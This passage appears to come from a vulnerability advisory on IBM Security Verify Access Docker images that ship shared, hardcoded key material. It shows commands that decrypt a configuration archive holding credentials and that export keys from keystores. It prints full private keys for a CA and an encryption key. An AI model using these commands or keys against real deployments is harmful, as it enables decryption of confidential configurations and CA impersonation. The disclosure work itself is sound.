ISVA and is stored inside Docker instances or retrieved over the network. 
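The `sha256sum | sort | uniq` check above can be generalized: hash the key material extracted from each image and group identical digests, since identical digests across images mean the supposedly per-device keys are in fact shared. A sketch with simulated files standing in for the real `.kdb`/`.sth` paths:

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path

def group_identical(paths):
    """Group files by SHA-256 digest; keep only groups with duplicates."""
    groups = defaultdict(list)
    for p in paths:
        digest = hashlib.sha256(Path(p).read_bytes()).hexdigest()
        groups[digest].append(p)
    return {d: files for d, files in groups.items() if len(files) > 1}

# Simulated stand-ins for device_key.sth files extracted from two different
# Docker images (identical bytes simulate the shared key material found above).
tmp = Path(tempfile.mkdtemp())
for name in ("runtime_device_key.sth", "wrp_device_key.sth"):
    (tmp / name).write_bytes(b"same-stash-bytes")

dupes = group_identical([tmp / "runtime_device_key.sth", tmp / "wrp_device_key.sth"])
print(len(dupes))  # → 1: one group of shared key material
```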
The `openldap.zip` file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using `isva_decrypt`, it is required to create a `/var/.ca` directory containing `device_key.kdb` and `device_key.sth` in a test machine):\n\n kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip\n [...]\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"2s\\0\\0etc/openldap/schema/nis.ldif\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\321\\0\\0etc/openldap/schema/collectiv\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\0etc/openldap/slapd-replica.conf\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"data/secAuthority-default/__db.0\"..., iov_len=1024}], 2) = 1024\n read(4, \"\\271=b\\223\\205\\320\\277\\365\\207\\302#T\\255\\355\\374Ct\\222\\332M`3%\\341\\361I\\301\\233j\\34\\1\\355\"..., 8191) = 1124\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"PK\\1\\2\\36\\3\\24\\0\\0\\0\\10\\0\\4Z-UQ\\202\\212\u003cV\\2\\0\\0\\0 \\0\\0000\\0\\30\\0\"..., iov_len=1024}], 2) = 1024\n writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"+\\0\\30\\0\\0\\0\\0\\0\\0\\0\\0\\0\\200\\201\\256\\213\\7\\0var/openldap/d\"..., iov_len=1024}], 2) = 1024\n read(4, \"\", 8191) = 0\n close(4) = 0\n write(5, \"\\5\\0\\3\\250\\302\\36cux\\v\\0\\1\\4\\0\\0\\0\\0\\4\\0\\0\\0\\0PK\\5\\6\\0\\0\\0\\0[\\0\"..., 44) = 44\n close(5) = 0\n unlink(\"openldap.zip\") = 0\n rename(\"/tmp/tmp.pxiQjh\", \"openldap.zip\") = 0\n unlink(\"/tmp/tmp.pxiQjh\") = -1 ENOENT (No such file or directory)\n close(3) = 0\n exit_group(0) = ?\n +++ exited with 0 +++\n kali-decryption% file openldap.zip \n openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store\n\nWhile doing an analysis of the zip file, we can find:\n\n- - credentials;\n- - passwords (e.g. 
in `etc/openldap/dynamic/replica-1.conf` and `etc/openldap/dynamic/passwd.conf`)\n- - RSA keys + certificates (e.g. in `etc/openldap/dynamic/server.key`)\n- - users in the logs. \n\nThe unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:\n\n kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done\n ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb\n ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb\n ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb\n 
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb\n ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb\n ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n\nThis allows an attacker to extract several private keys:\n\n Bag Attributes\n friendlyName: ca\n localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n Key Attributes: \u003cNo Attributes\u003e\n -----BEGIN PRIVATE KEY-----\n MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74\n 01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26\n X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM\n +Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr\n qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R\n CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs\n RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm\n MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu\n 894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy\n MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l\n 
zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr\n 7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM\n iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV\n PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+\n dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo\n o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT\n E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV\n mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM\n m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki\n xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG\n 0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb\n TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd\n Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm\n ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj\n dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR\n uxhPVbNJYbPOs02by37UXn8=\n -----END PRIVATE KEY-----\n Bag Attributes\n friendlyName: encKey\n localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n Key Attributes: \u003cNo Attributes\u003e\n -----BEGIN PRIVATE KEY-----\n 
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD\n N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM\n x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6\n szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw\n G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM\n DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3\n R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv\n 9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ\n eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi\n T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH\n f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt\n VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A\n UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH\n blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE\n X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC\n PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG\n 5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG\n UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA\n X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4\n DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649\n +YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee\n ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU\n WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC\n 5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy\n NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH\n arClGP/McDNH4FD3S9dgJQ==\n -----END PRIVATE KEY-----\n\n\nAnd the corresponding certificates:\n\n Bag Attributes\n friendlyName: ca\n localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 
AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n subject=C = us, O = ibm, OU = isam, CN = ca\n issuer=C = us, O = ibm, OU = isam, CN = ca\n -----BEGIN CERTIFICATE-----\n MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE\n BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew\n IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz\n MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN\n BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA\n fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0\n 6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90\n 3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW\n bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST\n 8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB\n o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU\n V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj\n Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP\n Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b\n dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641\n bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr\n gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75\n cGAPLNhMRL8=\n -----END CERTIFICATE-----\n Bag Attributes\n friendlyName: encKey\n localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 
3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n subject=C = US, O = IBM, OU = GSKIT, CN = encKey\n issuer=C = US, O = IBM, OU = GSKIT, CN = encKey\n -----BEGIN CERTIFICATE-----\n MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE\n BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu\n Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT\n AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL\n ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib\n ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7\n AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE\n MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii\n ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE\n PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ\n ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC\n pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK\n pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi\n enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi\n 0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b\n QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2\n 
4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5\n CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD\n 8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB\n +NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM\n Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/\n GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj\n DxxuUpf+LWXLEw==\n -----END CERTIFICATE-----\n\n\nAfter the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:\n\n kali-docker# openssl x509 -in ca.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)\n Signature Algorithm: sha256WithRSAEncryption\n Issuer: C=us, O=ibm, OU=isam, CN=ca\n Validity\n Not Before: Mar 21 04:57:03 2019 GMT\n Not After : May 11 04:57:03 2101 GMT\n Subject: C=us, O=ibm, OU=isam, CN=ca\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (2048 bit)\n Modulus:\n 00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:\n a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:\n fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:\n 7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:\n 81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:\n f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:\n 17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:\n 62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:\n 64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:\n 4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:\n b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:\n 56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:\n 22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:\n 22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:\n 05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:\n c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:\n 00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:\n 16:75\n Exponent: 65537 (0x10001)\n X509v3 extensions:\n X509v3 Authority Key Identifier: \n 
57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n X509v3 Subject Key Identifier: \n 57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n Signature Algorithm: sha256WithRSAEncryption\n Signature Value:\n 6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:\n a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:\n 20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:\n ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:\n 81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:\n 1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:\n 00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:\n f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:\n aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:\n 1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:\n 0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:\n 72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:\n 81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:\n b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:\n d8:4c:44:bf\n Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n kali-docker# openssl rsa -in ca.key -modulus -noout \n 
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n \n kali-docker# openssl x509 -in encKey.pem -text -noout -modulus\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)\n Signature Algorithm: sha1WithRSAEncryption\n Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey\n Validity\n Not Before: Mar 21 04:56:59 2019 GMT\n Not After : Mar 19 04:56:59 2029 GMT\n Subject: C=US, O=IBM, OU=GSKIT, CN=encKey\n Subject Public Key Info:\n Public Key Algorithm: rsaEncryption\n Public-Key: (2048 bit)\n Modulus:\n 00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:\n 47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:\n 79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:\n 15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:\n 59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:\n 50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:\n 3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:\n f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:\n 